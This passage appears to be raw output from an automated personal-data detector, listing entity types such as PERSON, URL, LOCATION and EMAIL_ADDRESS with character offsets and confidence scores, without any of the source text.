PERSON, start: 10946, end: 10973, score: 0.85, type: PERSON, start: 11999, end: 12026, score: 0.85, type: URL, start: 395, end: 453, score: 0.6, type: URL, start: 469, end: 521, score: 0.6, type: URL, start: 56, end: 65, score: 0.5, type: URL, start: 107, end: 116, score: 0.5, type: URL, start: 157, end: 166, score: 0.5, type: URL, start: 205, end: 214, score: 0.5, type: URL, start: 258, end: 267, score: 0.5, type: URL, start: 303, end: 312, score: 0.5, type: URL, start: 357, end: 366, score: 0.5, type: URL, start: 1048, end: 1066, score: 0.5, type: URL, start: 1223, end: 1241, score: 0.5, type: URL, start: 1313, end: 1331, score: 0.5, type: URL, start: 1513, end: 1520, score: 0.5, type: URL, start: 1577, end: 1591, score: 0.5, type: URL, start: 1613, end: 1627, score: 0.5, type: URL, start: 1962, end: 1969, score: 0.5, type: URL, start: 2057, end: 2066, score: 0.5, type: URL, start: 2313, end: 2331, score: 0.5, type: URL, start: 2520, end: 2533, score: 0.5, type: URL, start: 2572, end: 2585, score: 0.5, type: URL, start: 2600, end: 2607, score: 0.5, type: URL, start: 2616, end: 2623, score: 0.5, type: URL, start: 3602, end: 3609, score: 0.5, type: URL, start: 3762, end: 3775, score: 0.5, type: URL, start: 3824, end: 3831, score: 0.5, type: URL, start: 4029, end: 4037, score: 0.5, type: URL, start: 4082, end: 4095, score: 0.5, type: URL, start: 4428, end: 4439, score: 0.5, type: URL, start: 4514, end: 4520, score: 0.5, type: URL, start: 4569, end: 4582, score: 0.5, type: URL, start: 4733, end: 4741, score: 0.5, type: URL, start: 4879, end: 4885, score: 0.5, type: URL, start: 5013, end: 5019, score: 0.5, type: URL, start: 5134, end: 5140, score: 0.5, type: URL, start: 5204, end: 5215, score: 0.5, type: URL, start: 5222, end: 5228, score: 0.5, type: URL, start: 5298, end: 5304, score: 0.5, type: URL, start: 5497, end: 5510, score: 0.5, type: URL, start: 5559, end: 5566, score: 0.5, type: URL, start: 5641, end: 5649, score: 0.5, type: URL, start: 5714, end: 5726, score: 0.5, type: URL, start: 5771, end: 5784, score: 0.5, type: URL, start: 6654, end: 6667, score: 0.5, type: URL, start: 6997, end: 7004, score: 0.5, type: URL, start: 7194, end: 7210, score: 0.5, type: URL, start: 7234, end: 7250, score: 0.5, type: URL, start: 7263, end: 7274, score: 0.5, type: URL, start: 7312, end: 7325, score: 0.5, type: URL, start: 7693, end: 7709, score: 0.5, type: URL, start: 7761, end: 7777, score: 0.5, type: URL, start: 7803, end: 7819, score: 0.5, type: URL, start: 7861, end: 7867, score: 0.5, type: URL, start: 7881, end: 7897, score: 0.5, type: URL, start: 7979, end: 7986, score: 0.5, type: URL, start: 7992, end: 8004, score: 0.5, type: URL, start: 8358, end: 8374, score: 0.5, type: URL, start: 8407, end: 8423, score: 0.5, type: URL, start: 8451, end: 8457, score: 0.5, type: URL, start: 8513, end: 8519, score: 0.5, type: URL, start: 8753, end: 8763, score: 0.5, type: URL, start: 8816, end: 8826, score: 0.5, type: URL, start: 8930, end: 8948, score: 0.5, type: URL, start: 8996, end: 9004, score: 0.5, type: URL, start: 9157, end: 9163, score: 0.5, type: URL, start: 9291, end: 9309, score: 0.5, type: URL, start: 9354, end: 9366, score: 0.5, type: URL, start: 9523, end: 9531, score: 0.5, type: URL, start: 9576, end: 9588, score: 0.5, type: URL, start: 10203, end: 10219, score: 0.5, type: URL, start: 10389, end: 10402, score: 0.5, type: URL, start: 10659, end: 10666, score: 0.5, type: URL, start: 10953, end: 10969, score: 0.5, type: URL, start: 11002, end: 11018, score: 0.5, type: URL, start: 11051, end: 11062, score: 0.5, type: URL, start: 11126, end: 11134, score: 0.5, type: URL, start: 11177, end: 11186, score: 0.5, type: URL, start: 11252, end: 11268, score: 0.5, type: URL, start: 11436, end: 11449, score: 0.5, type: URL, start: 12006, end: 12022, score: 0.5, type: URL, start: 12055, end: 12071, score: 0.5, type: URL, start: 12104, end: 12115, score: 0.5, type: URL, start: 12278, end: 12294, score: 0.5, type: URL, start: 12342, end: 12355, score: 0.5, type: URL, start: 12395, end: 12408, score: 0.5, type: MEDICAL_LICENSE, start: 12781, end: 12790, score: 1.0, type: MEDICAL_LICENSE, start: 12894, end: 12903, score: 1.0, type: DATE_TIME, start: 39, end: 48, score: 0.85, type: NRP, start: 435, end: 446, score: 0.85, type: PERSON, start: 825, end: 836, score: 0.85, type: PERSON, start: 892, end: 896, score: 0.85, type: PERSON, start: 929, end: 933, score: 0.85, type: LOCATION, start: 1090, end: 1094, score: 0.85, type: PERSON, start: 1898, end: 1911, score: 0.85, type: PERSON, start: 1958, end: 1971, score: 0.85, type: PERSON, start: 2195, end: 2208, score: 0.85, type: PERSON, start: 2253, end: 2266, score: 0.85, type: PERSON, start: 4578, end: 4586, score: 0.85, type: PERSON, start: 6597, end: 6605, score: 0.85, type: PERSON, start: 6725, end: 6733, score: 0.85, type: PERSON, start: 7660, end: 7668, score: 0.85, type: PERSON, start: 8096, end: 8104, score: 0.85, type: PERSON, start: 11378, end: 11438, score: 0.85, type: PERSON, start: 11504, end: 11517, score: 0.85, type: LOCATION, start: 12191, end: 12193, score: 0.85, type: LOCATION, start: 12384, end: 12386, score: 0.85, type: LOCATION, start: 12527, end: 12529, score: 0.85, type: LOCATION, start: 12676, end: 12678, score: 0.85, type: LOCATION, start: 12882, end: 12884, score: 0.85, type: LOCATION, start: 13053, end: 13055, score: 0.85, type: PERSON, start: 14665, end: 14709, score: 0.85, type: PERSON, start: 14969, end: 14982, score: 0.85, type: PERSON, start: 15035, end: 15048, score: 0.85, type: LOCATION, start: 15167, end: 15172, score: 0.85, type: PERSON, start: 15407, end: 15412, score: 0.85, type: PERSON, start: 15458, end: 15503, score: 0.85, type: PERSON, start: 15576, end: 15584, score: 0.85, type: PERSON, start: 15953, end: 15966, score: 0.85, type: PERSON, start: 16019, end: 16032, score: 0.85, type: PERSON, start: 17412, end: 17425, score: 0.85, type: PERSON, start: 17478, end: 17491, score: 0.85, type: PERSON, start: 17826, end: 17871, score: 0.85, type: PERSON, start: 18409, end: 18422, score: 0.85, type: PERSON, start: 18475, end: 18488, score: 0.85, type: PERSON, start: 20002, end: 20015, score: 0.85, type: PERSON, start: 20068, end: 20081, score: 0.85, type: PERSON, start: 21634, end: 21647, score: 0.85, type: PERSON, start: 22019, end: 22032, score: 0.85, type: PERSON, start: 25941, end: 25954, score: 0.85, type: PERSON, start: 27478, end: 27491, score: 0.85, type: URL, start: 162, end: 213, score: 0.6, type: URL, start: 20929, end: 20976, score: 0.6, type: URL, start: 508, end: 520, score: 0.5, type: URL, start: 1370, end: 1377, score: 0.5, type: URL, start: 1408, end: 1415, score: 0.5, type: URL, start: 1551, end: 1558, score: 0.5, type: URL, start: 1629, end: 1636, score: 0.5, type: URL, start: 1724, end: 1731, score: 0.5, type: URL, start: 1782, end: 1793, score: 0.5, type: URL, start: 1864, end: 1871, score: 0.5, type: URL, start: 1898, end: 1905, score: 0.5, type: URL, start: 1922, end: 1929, score: 0.5, type: URL, start: 1958, end: 1965, score: 0.5, type: URL, start: 1982, end: 1989, score: 0.5, type: URL, start: 2010, end: 2017, score: 0.5, type: URL, start: 2053, end: 2060, score: 0.5, type: URL, start: 2081, end: 2088, score: 0.5, type: URL, start: 2124, end: 2131, score: 0.5, type: URL, start: 2152, end: 2159, score: 0.5, type: URL, start: 2195, end: 2202, score: 0.5, type: URL, start: 2219, end: 2226, score: 0.5, type: URL, start: 2253, end: 2260, score: 0.5, type: URL, start: 2278, end: 2289, score: 0.5, type: URL, start: 2377, end: 2384, score: 0.5, type: URL, start: 2400, end: 2407, score: 0.5, type: URL, start: 2539, end: 2546, score: 0.5, type: URL, start: 2602, end: 2613, score: 0.5, type: URL, start: 2807, end: 2814, score: 0.5, type: URL, start: 2903, end: 2910, score: 0.5, type: URL, start: 3067, end: 3074, score: 0.5, type: URL, start: 3267, end: 3274, score: 0.5, type: URL, start: 3393, end: 3400, score: 0.5, type: URL, start: 3520, end: 3527, score: 0.5, type: URL, start: 3650, end: 3657, score: 0.5, type: URL, start: 3795, end: 3802, score: 0.5, type: URL, start: 3932, end: 3939, score: 0.5, type: URL, start: 4065, end: 4072, score: 0.5, type: URL, start: 4220, end: 4227, score: 0.5, type: URL, start: 4380, end: 4387, score: 0.5, type: URL, start: 4540, end: 4547, score: 0.5, type: URL, start: 4589, end: 4596, score: 0.5, type: URL, start: 4697, end: 4704, score: 0.5, type: URL, start: 4752, end: 4759, score: 0.5, type: URL, start: 4866, end: 4873, score: 0.5, type: URL, start: 4995, end: 5002, score: 0.5, type: URL, start: 5115, end: 5122, score: 0.5, type: URL, start: 5221, end: 5228, score: 0.5, type: URL, start: 5338, end: 5345, score: 0.5, type: URL, start: 5484, end: 5491, score: 0.5, type: URL, start: 5656, end: 5663, score: 0.5, type: URL, start: 5804, end: 5811, score: 0.5, type: URL, start: 5956, end: 5963, score: 0.5, type: URL, start: 6143, end: 6150, score: 0.5, type: URL, start: 6302, end: 6309, score: 0.5, type: URL, start: 6490, end: 6497, score: 0.5, type: URL, start: 6621, end: 6628, score: 0.5, type: URL, start: 6749, end: 6756, score: 0.5, type: URL, start: 6924, end: 6931, score: 0.5, type: URL, start: 6987, end: 6998, score: 0.5, type: URL, start: 7132, end: 7137, score: 0.5, type: URL, start: 7172, end: 7179, score: 0.5, type: URL, start: 7341, end: 7346, score: 0.5, type: URL, start: 7375, end: 7382, score: 0.5, type: URL, start: 7512, end: 7517, score: 0.5, type: URL, start: 7552, end: 7559, score: 0.5, type: URL, start: 7752, end: 7757, score: 0.5, type: URL, start: 7786, end: 7793, score: 0.5, type: URL, start: 7950, end: 7955, score: 0.5, type: URL, start: 7990, end: 7997, score: 0.5, type: URL, start: 8204, end: 8209, score: 0.5, type: URL, start: 8238, end: 8245, score: 0.5, type: URL, start: 8454, end: 8461, score: 0.5, type: URL, start: 8515, end: 8522, score: 0.5, type: URL, start: 8609, end: 8620, score: 0.5, type: URL, start: 8848, end: 8855, score: 0.5, type: URL, start: 8906, end: 8913, score: 0.5, type: URL, start: 9054, end: 9061, score: 0.5, type: URL, start: 9243, end: 9250, score: 0.5, type: URL, start: 9439, end: 9446, score: 0.5, type: URL, start: 9733, end: 9740, score: 0.5, type: URL, start: 10004, end: 10011, score: 0.5, type: URL, start: 10280, end: 10287, score: 0.5, type: URL, start: 10641, end: 10652, score: 0.5, type: URL, start: 10783, end: 10790, score: 0.5, type: URL, start: 10841, end: 10848, score: 0.5, type: URL, start: 10911, end: 10918, score: 0.5, type: URL, start: 11103, end: 11110, score: 0.5, type: URL, start: 11383, end: 11390, score: 0.5, type: URL, start: 11411, end: 11418, score: 0.5, type: URL, start: 11470, end: 11477, score: 0.5, type: URL, start: 11504, end: 11511, score: 0.5, type: URL, start: 11622, end: 11629, score: 0.5, type: URL, start: 11883, end: 11890, score: 0.5, type: URL, start: 12158, end: 12165, score: 0.5, type: URL, start: 12351, end: 12358, score: 0.5, type: URL, start: 12494, end: 12501, score: 0.5, type: URL, start: 12643, end: 12650, score: 0.5, type: URL, start: 12849, end: 12856, score: 0.5, type: URL, start: 13020, end: 13027, score: 0.5, type: URL, start: 13191, end: 13198, score: 0.5, type: URL, start: 13245, end: 13252, score: 0.5, type: URL, start: 13380, end: 13387, score: 0.5, type: URL, start: 13439, end: 13446, score: 0.5, type: URL, start: 13497, end: 13512, score: 0.5, type: URL, start: 13914, end: 13921, score: 0.5, type: URL, start: 13964, end: 13971, score: 0.5, type: URL, start: 14018, end: 14025, score: 0.5, type: URL, start: 14077, end: 14084, score: 0.5, type: URL, start: 14238, end: 14245, score: 0.5, type: URL, start: 14297, end: 14304, score: 0.5, type: URL, start: 14476, end: 14483, score: 0.5, type: URL, start: 14675, end: 14682, score: 0.5, type: URL, start: 14829, end: 14836, score: 0.5, type: URL, start: 14915, end: 14922, score: 0.5, type: URL, start: 14969, end: 14976, score: 0.5, type: URL, start: 14997, end: 15004, score: 0.5, type: URL, start: 15035, end: 15042, score: 0.5, type: URL, start: 15076, end: 15083, score: 0.5, type: URL, start: 15268, end: 15275, score: 0.5, type: URL, start: 15315, end: 15322, score: 0.5, type: URL, start: 15365, end: 15372, score: 0.5, type: URL, start: 15415, end: 15422, score: 0.5, type: URL, start: 15469, end: 15476, score: 0.5, type: URL, start: 15528, end: 15535, score: 0.5, type: URL, start: 15587, end: 15594, score: 0.5, type: URL, start: 15646, end: 15653, score: 0.5, type: URL, start: 15775, end: 15782, score: 0.5, type: URL, start: 15837, end: 15844, score: 0.5, type: URL, start: 15892, end: 15899, score: 0.5, type: URL, start: 15953, end: 15960, score: 0.5, type: URL, start: 15981, end: 15988, score: 0.5, type: URL, start: 16019, end: 16026, score: 0.5, type: URL, start: 16211, end: 16218, score: 0.5, type: URL, start: 16346, end: 16353, score: 0.5, type: URL, start: 16407, end: 16414, score: 0.5, type: URL, start: 16568, end: 16575, score: 0.5, type: URL, start: 16751, end: 16758, score: 0.5, type: URL, start: 16810, end: 16817, score: 0.5, type: URL, start: 16895, end: 16902, score: 0.5, type: URL, start: 17093, end: 17100, score: 0.5, type: URL, start: 17272, end: 17279, score: 0.5, type: URL, start: 17345, end: 17352, score: 0.5, type: URL, start: 17412, end: 17419, score: 0.5, type: URL, start: 17440, end: 17447, score: 0.5, type: URL, start: 17478, end: 17485, score: 0.5, type: URL, start: 17519, end: 17526, score: 0.5, type: URL, start: 17686, end: 17693, score: 0.5, type: URL, start: 17733, end: 17740, score: 0.5, type: URL, start: 17783, end: 17790, score: 0.5, type: URL, start: 17837, end: 17844, score: 0.5, type: URL, start: 17896, end: 17903, score: 0.5, type: URL, start: 17945, end: 17952, score: 0.5, type: URL, start: 18056, end: 18063, score: 0.5, type: URL, start: 18172, end: 18179, score: 0.5, type: URL, start: 18230, end: 18237, score: 0.5, type: URL, start: 18292, end: 18299, score: 0.5, type: URL, start: 18348, end: 18355, score: 0.5, type: URL, start: 18409, end: 18416, score: 0.5, type: URL, start: 18437, end: 18444, score: 0.5, type: URL, start: 18475, end: 18482, score: 0.5, type: URL, start: 18517, end: 18524, score: 0.5, type: URL, start: 18643, end: 18650, score: 0.5, type: URL, start: 18705, end: 18712, score: 0.5, type: URL, start: 18867, end: 18874, score: 0.5, type: URL, start: 19088, end: 19095, score: 0.5, type: URL, start: 19148, end: 19155, score: 0.5, type: URL, start: 19234, end: 19241, score: 0.5, type: URL, start: 19305, end: 19316, score: 0.5, type: URL, start: 19490, end: 19497, score: 0.5, type: URL, start: 19561, end: 19572, score: 0.5, type: URL, start: 19735, end: 19742, score: 0.5, type: URL, start: 19841, end: 19852, score: 0.5, type: URL, start: 19879, end: 19886, score: 0.5, type: URL, start: 19944, end: 19951, score: 0.5, type: URL, start: 20002, end: 20009, score: 0.5, type: URL, start: 20030, end: 20037, score: 0.5, type: URL, start: 20068, end: 20075, score: 0.5, type: URL, start: 20109, end: 20116, score: 0.5, type: URL, start: 20321, end: 20328, score: 0.5, type: URL, start: 20535, end: 20542, score: 0.5, type: URL, start: 20711, end: 20718, score: 0.5, type: URL, start: 21025, end: 21032, score: 0.5, type: URL, start: 21093, end: 21100, score: 0.5, type: URL, start: 21201, end: 21208, score: 0.5, type: URL, start: 21509, end: 21516, score: 0.5, type: URL, start: 21554, end: 21561, score: 0.5, type: URL, start: 21600, end: 21607, score: 0.5, type: URL, start: 21634, end: 21641, score: 0.5, type: URL, start: 21687, end: 21694, score: 0.5, type: URL, start: 21730, end: 21737, score: 0.5, type: URL, start: 21798, end: 21805, score: 0.5, type: URL, start: 21859, end: 21866, score: 0.5, type: URL, start: 21924, end: 21931, score: 0.5, type: URL, start: 21985, end: 21992, score: 0.5, type: URL, start: 22019, end: 22026, score: 0.5, type: URL, start: 22140, end: 22147, score: 0.5, type: URL, start: 22287, end: 22294, score: 0.5, type: URL, start: 22441, end: 22448, score: 0.5, type: URL, start: 22721, end: 22728, score: 0.5, type: URL, start: 22881, end: 22888, score: 0.5, type: URL, start: 23072, end: 23079, score: 0.5, type: URL, start: 23236, end: 23243, score: 0.5, type: URL, start: 23394, end: 23401, score: 0.5, type: URL, start: 23530, end: 23537, score: 0.5, type: URL, start: 23584, end: 23591, score: 0.5, type: URL, start: 23654, end: 23661, score: 0.5, type: URL, start: 23909, end: 23916, score: 0.5, type: URL, start: 24035, end: 24042, score: 0.5, type: URL, start: 24251, end: 24258, score: 0.5, type: URL, start: 24377, end: 24384, score: 0.5, type: URL, start: 24529, end: 24536, score: 0.5, type: URL, start: 24583, end: 24590, score: 0.5, type: URL, start: 24653, end: 24660, score: 0.5, type: URL, start: 25190, end: 25197, score: 0.5, type: URL, start: 25485, end: 25492, score: 0.5, type: URL, start: 25590, end: 25601, score: 0.5, type: URL, start: 25723, end: 25730, score: 0.5, type: URL, start: 25751, end: 25758, score: 0.5, type: URL, start: 25803, end: 25810, score: 0.5, type: URL, start: 25941, end: 25948, score: 0.5, type: URL, start: 26113, end: 26120, score: 0.5, type: URL, start: 26185, end: 26192, score: 0.5, type: URL, start: 26259, end: 26266, score: 0.5, type: URL, start: 26539, end: 26546, score: 0.5, type: URL, start: 26877, end: 26884, score: 0.5, type: URL, start: 27015, end: 27022, score: 0.5, type: URL, start: 27134, end: 27141, score: 0.5, type: URL, start: 27260, end: 27267, score: 0.5, type: URL, start: 27288, end: 27295, score: 0.5, type: URL, start: 27340, end: 27347, score: 0.5, type: URL, start: 27478, end: 27485, score: 0.5, type: URL, start: 27653, end: 27660, score: 0.5, type: URL, start: 27725, end: 27732, score: 0.5, type: URL, start: 27799, end: 27806, score: 0.5, type: URL, start: 28085, end: 28092, score: 0.5, type: URL, start: 28411, end: 28418, score: 0.5, type: URL, start: 28537, end: 28544, score: 0.5, type: URL, start: 28681, end: 28688, score: 0.5, type: EMAIL_ADDRESS, start: 1379, end: 1394, score: 1.0, type: PERSON, start: 770, end: 780, score: 0.85, type: PERSON, start: 826, end: 841, score: 0.85, type: PERSON, start: 844, end: 869, score: 0.85, type: PERSON, start: 1799, end: 1823, score: 0.85, type: PERSON, start: 1891, end: 1904, score: 0.85, type: PERSON, start: 2410, end: 2414, score: 0.85, type: PERSON, start: 3153, end: 3157, score: 0.85, type: DATE_TIME, start: 4019, end: 4047, score: 0.85, type: PERSON, start: 4114, end: 4141, score: 0.85, type: DATE_TIME, start: 4210, end: 4238, score: 0.85, type: DATE_TIME, start: 5114, end: 5142, score: 0.85, type: LOCATION, start: 5791, end: 5806, score: 0.85, type: DATE_TIME, start: 7721, end: 7749, score: 0.85, type: URL, start: 1229, end: 1295, score: 0.6, type: IP_ADDRESS, start: 6230, end: 6232, score: 0.6, type: URL, start: 1385, end: 1394, score: 0.5, type: URL, start: 1604, end: 1613, score: 0.5, type: URL, start: 1643, end: 1650, score: 0.5, type: URL, start: 1827, end: 1834, score: 0.5, type: URL, start: 1962, end: 1971, score: 0.5, type: URL, start: 2515, end: 2524, score: 0.5, type: URL, start: 2728, end: 2737, score: 0.5, type: URL, start: 2761, end: 2770, score: 0.5, type: URL, start: 3049, end: 3058, score: 0.5, type: URL, start: 3176, end: 3190, score: 0.5, type: URL, start: 3908, end: 3917, score: 0.5, type: URL, start: 3950, end: 3957, score: 0.5, type: URL, start: 3999, end: 4007, score: 0.5, type: URL, start: 4030, end: 4037, score: 0.5, type: URL, start: 4128, end: 4138, score: 0.5, type: URL, start: 4177, end: 4185, score: 0.5, type: URL, start: 4221, end: 4228, score: 0.5, type: URL, start: 4348, end: 4357, score: 0.5, type: URL, start: 4543, end: 4561, score: 0.5, type: URL, start: 4618, end: 4636, score: 0.5, type: URL, start: 4682, end: 4693, score: 0.5, type: URL, start: 4707, end: 4716, score: 0.5, type: URL, start: 4764, end: 4775, score: 0.5, type: URL, start: 4777, end: 4783, score: 0.5, type: URL, start: 4815, end: 4826, score: 0.5, type: URL, start: 4828, end: 4834, score: 0.5, type: URL, start: 4975, end: 4984, score: 0.5, type: URL, start: 5015, end: 5024, score: 0.5, type: URL, start: 5081, end: 5089, score: 0.5, type: URL, start: 5125, end: 5132, score: 0.5, type: URL, start: 5325, end: 5334, score: 0.5, type: URL, start: 6067, end: 6072, score: 0.5, type: URL, start: 6215, end: 6224, score: 0.5, type: URL, start: 6614, end: 6623, score: 0.5, type: URL, start: 7007, end: 7016, score: 0.5, type: URL, start: 7561, end: 7570, score: 0.5, type: URL, start: 7677, end: 7685, score: 0.5, type: URL, start: 7732, end: 7739, score: 0.5, type: EMAIL_ADDRESS, start: 39, end: 54, score: 1.0, type: DATE_TIME, start: 18, end: 22, score: 0.85, type: PERSON, start: 23, end: 38, score: 0.85, type: LOCATION, start: 664, end: 672, score: 0.85, type: LOCATION, start: 674, end: 683, score: 0.85, type: LOCATION, start: 685, end: 693, score: 0.85, type: LOCATION, start: 695, end: 698, score: 0.85, type: URL, start: 45, end: 54, score: 0.5, type: URL, start: 1218, end: 1225, score: 0.5, type: URL, start: 1553, end: 1560, score: 0.5, type: URL, start: 1816, end: 1825, score: 0.5, type: URL, start: 2046, end: 2055, score: 0.5, type: LOCATION, start: 330, end: 342, score: 0.85, type: URL, start: 364, end: 373, score: 0.85, type: URL, start: 457, end: 466, score: 0.85, type: PERSON, start: 576, end: 587, score: 0.85, type: PERSON, start: 667, end: 678, score: 0.85, type: PERSON, start: 740, end: 753, score: 0.85, type: PERSON, start: 781, end: 792, score: 0.85, type: PERSON, start: 857, end: 870, score: 0.85, type: PERSON, start: 898, end: 909, score: 0.85, type: LOCATION, start: 942, end: 944, score: 0.85, type: PERSON, start: 995, end: 1006, score: 0.85, type: PERSON, start: 1118, end: 1129, score: 0.85, type: PERSON, start: 1234, end: 1245, score: 0.85, type: PERSON, start: 1390, end: 1401, score: 0.85, type: PERSON, start: 1472, end: 1483, score: 0.85, type: PERSON, start: 1579, end: 1590, score: 0.85, type: PERSON, start: 1643, end: 1654, score: 0.85, type: URL, start: 2163, end: 2168, score: 0.85, type: IP_ADDRESS, start: 621, end: 630, score: 0.6, type: IP_ADDRESS, start: 715, end: 724, score: 0.6, type: IP_ADDRESS, start: 832, end: 841, score: 0.6, type: IP_ADDRESS, start: 949, end: 958, score: 0.6, type: IP_ADDRESS, start: 1088, end: 1097, score: 0.6, type: DATE_TIME, start: 1334, end: 1342, score: 0.6, type: DATE_TIME, start: 1737, end: 1743, score: 0.6, type: URL, start: 1790, end: 1817, score: 0.6, type: URL, start: 1824, end: 1867, score: 0.6, type: URL, start: 1874, end: 1915, score: 0.6, type: URL, start: 253, end: 264, score: 0.5, type: URL, start: 280, end: 289, score: 0.5, type: URL, start: 1950, end: 1968, score: 0.5, type: URL, start: 1989, end: 1998, score: 0.5, type: URL, start: 2027, end: 2036, score: 0.5, type: URL, start: 2076, end: 2090, score: 0.5, type: LOCATION, start: 78, end: 83, score: 0.85, type: NRP, start: 422, end: 433, score: 0.85, type: URL, start: 3793, end: 3802, score: 0.85, type: URL, start: 4178, end: 4189, score: 0.85, type: URL, start: 4263, end: 4285, score: 0.85, type: PERSON, start: 5043, end: 5081, score: 0.85, type: PERSON, start: 5101, end: 5141, score: 0.85, type: PHONE_NUMBER, start: 827, end: 837, score: 0.75, type: IP_ADDRESS, start: 765, end: 766, score: 0.6, type: IP_ADDRESS, start: 937, end: 942, score: 0.6, type: URL, start: 422, end: 429, score: 0.5, type: URL, start: 874, end: 885, score: 0.5, type: URL, start: 3627, end: 3634, score: 0.5, type: URL, start: 3672, end: 3681, score: 0.5, type: URL, start: 3739, end: 3748, score: 0.5, type: URL, start: 3954, end: 3967, score: 0.5, type: URL, start: 3995, end: 4001, score: 0.5, type: URL, start: 4457, end: 4464, score: 0.5, type: URL, start: 4922, end: 4929, score: 0.5, type: URL, start: 5056, end: 5066, score: 0.5, type: URL, start: 5114, end: 5124, score: 0.5, type: URL, start: 5178, end: 5186, score: 0.5, type: URL, start: 5276, end: 5283, score: 0.5, type: URL, start: 5307, end: 5314, score: 0.5, type: EMAIL_ADDRESS, start: 67, end: 82, score: 1.0, type: PERSON, start: 51, end: 66, score: 0.85, type: LOCATION, start: 543, end: 552, score: 0.85, type: LOCATION, start: 597, end: 606, score: 0.85, type: LOCATION, start: 1835, end: 1844, score: 0.85, type: LOCATION, start: 1893, end: 1902, score: 0.85, type: LOCATION, start: 2260, end: 2272, score: 0.85, type: PERSON, start: 2505, end: 2508, score: 0.85, type: LOCATION, start: 2986, end: 2995, score: 0.85, type: PERSON, start: 3753, end: 3771, score: 0.85, type: LOCATION, start: 3852, end: 3856, score: 0.85, type: NRP, start: 4143, end: 4146, score: 0.85, type: LOCATION, start: 4192, end: 4194, score: 0.85, type: LOCATION, start: 4241, end: 4260, score: 0.85, type: LOCATION, start: 4669, end: 4678, score: 0.85, type: LOCATION, start: 4798, end: 4807, score: 0.85, type: LOCATION, start: 5588, end: 5597, score: 0.85, type: LOCATION, start: 5964, end: 5973, score: 0.85, type: LOCATION, start: 6091, end: 6100, score: 0.85, type: NRP, start: 6284, end: 6292, score: 0.85, type: LOCATION, start: 6693, end: 6702, score: 0.85, type: LOCATION, start: 6820, end: 6829, score: 0.85, type: URL, start: 73, end: 82, score: 0.5, type: URL, start: 1238, end: 1243, score: 0.5, type: URL, start: 1315, end: 1320, score: 0.5, type: URL, start: 1372, end: 1378, score: 0.5, type: URL, start: 1421, end: 1427, score: 0.5, type: URL, start: 1544, end: 1551, score: 0.5, type: URL, start: 1558, end: 1563, score: 0.5, type: URL, start: 2181, end: 2188, score: 0.5, type: URL, start: 2234, end: 2239, score: 0.5, type: URL, start: 2260, end: 2265, score: 0.5, type: URL, start: 2362, end: 2366, score: 0.5, type: URL, start: 2376, end: 2380, score: 0.5, type: URL, start: 2512, end: 2516, score: 0.5, type: URL, start: 2524, end: 2528, score: 0.5, type: URL, start: 2548, end: 2558, score: 0.5, type: URL, start: 2662, end: 2672, score: 0.5, type: URL, start: 2687, end: 2692, score: 0.5, type: URL, start: 2959, end: 2963, score: 0.5, type: URL, start: 2968, end: 2974, score: 0.5, type: URL, start: 3010, end: 3014, score: 0.5, type: URL, start: 3069, end: 3079, score: 0.5, type: URL, start: 3239, end: 3246, score: 0.5, type: URL, start: 3281, end: 3286, score: 0.5, type: URL, start: 3290, end: 3313, score: 0.5, type: URL, start: 3398, end: 3405, score: 0.5, type: URL, start: 3465, end: 3472, score: 0.5, type: URL, start: 3480, end: 3487, score: 0.5, type: URL, start: 3730, end: 3735, score: 0.5, type: URL, start: 3857, end: 3869, score: 0.5, type: URL, start: 3916, end: 3921, score: 0.5, type: URL, start: 4174, end: 4179, score: 0.5, type: URL, start: 4306, end: 4313, score: 0.5, type: URL, start: 4338, end: 4345, score: 0.5, type: URL, start: 4352, end: 4357, score: 0.5, type: URL, start: 4378, end: 4385, score: 0.5, type: URL, start: 4394, end: 4399, score: 0.5, type: URL, start: 4423, end: 4430, score: 0.5, type: URL, start: 4458, end: 4465, score: 0.5, type: URL, start: 4916, end: 4921, score: 0.5, type: URL, start: 4976, end: 4983, score: 0.5, type: URL, start: 5008, end: 5015, score: 0.5, type: URL, start: 5042, end: 5049, score: 0.5, type: URL, start: 5080, end: 5087, score: 0.5, type: URL, start: 5112, end: 5117, score: 0.5, type: URL, start: 5167, end: 5172, score: 0.5, type: URL, start: 5203, end: 5208, score: 0.5, type: URL, start: 5285, end: 5290, score: 0.5, type: URL, start: 5299, end: 5306, score: 0.5, type: URL, start: 5344, end: 5351, score: 0.5, type: URL, start: 5707, end: 5714, score: 0.5, type: URL, start: 5750, end: 5757, score: 0.5, type: URL, start: 5763, end: 5767, score: 0.5, type: URL, start: 6207, end: 6214, score: 0.5, type: URL, start: 6402, end: 6407, score: 0.5, type: URL, start: 6485, end: 6498, score: 0.5, type: URL, start: 6511, end: 6516, score: 0.5, type: URL, start: 7000, end: 7007, score: 0.5, type: EMAIL_ADDRESS, start: 945, end: 960, score: 1.0, type: EMAIL_ADDRESS, start: 983, end: 998, score: 1.0, type: EMAIL_ADDRESS, start: 1021, end: 1036, score: 1.0, type: EMAIL_ADDRESS, start: 1056, end: 1071, score: 1.0, type: EMAIL_ADDRESS, start: 1097, end: 1112, score: 1.0, type: DATE_TIME, start: 64, end: 73, score: 0.85, type: LOCATION, start: 75, end: 82, score: 0.85, type: LOCATION, start: 152, end: 159, score: 0.85, type: LOCATION, start: 165, end: 172, score: 0.85, type: LOCATION, start: 417, end: 424, score: 0.85, type: LOCATION, start: 749, end: 756, score: 0.85, type: DATE_TIME, start: 916, end: 925, score: 0.85, type: PERSON, start: 933, end: 943, score: 0.85, type: PERSON, start: 967, end: 981, score: 0.85, type: PERSON, start: 1005, end: 1019, score: 0.85, type: PERSON, start: 1043, end: 1054, score: 0.85, type: PERSON, start: 1078, end: 1095, score: 0.85, type: PERSON, start: 1138, end: 1145, score: 0.85, type: PERSON, start: 1152, end: 1159, score: 0.85, type: PERSON, start: 1408, end: 1415, score: 0.85, type: PERSON, start: 1745, end: 1752, score: 0.85, type: PERSON, start: 2318, end: 2352, score: 0.85, type: URL, start: 772, end: 800, score: 0.6, type: URL, start: 1768, end: 1796, score: 0.6, type: URL, start: 951, end: 960, score: 0.5, type: URL, start: 989, end: 998, score: 0.5, type: URL, start: 1027, end: 1036, score: 0.5, type: URL, start: 1062, end: 1071, score: 0.5, type: URL, start: 1103, end: 1112, score: 0.5, type: URL, start: 1961, end: 1968, score: 0.5, type: URL, start: 1995, end: 2014, score: 0.5, type: URL, start: 2057, end: 2079, score: 0.5, type: URL, start: 2175, end: 2194, score: 0.5, type: URL, start: 2262, end: 2281, score: 0.5, type: URL, start: 2369, end: 2376, score: 0.5, type: URL, start: 2399, end: 2406, score: 0.5, type: URL, start: 2432, end: 2439, score: 0.5, type: URL, start: 2459, end: 2466, score: 0.5, type: URL, start: 2567, end: 2574, score: 0.5, type: 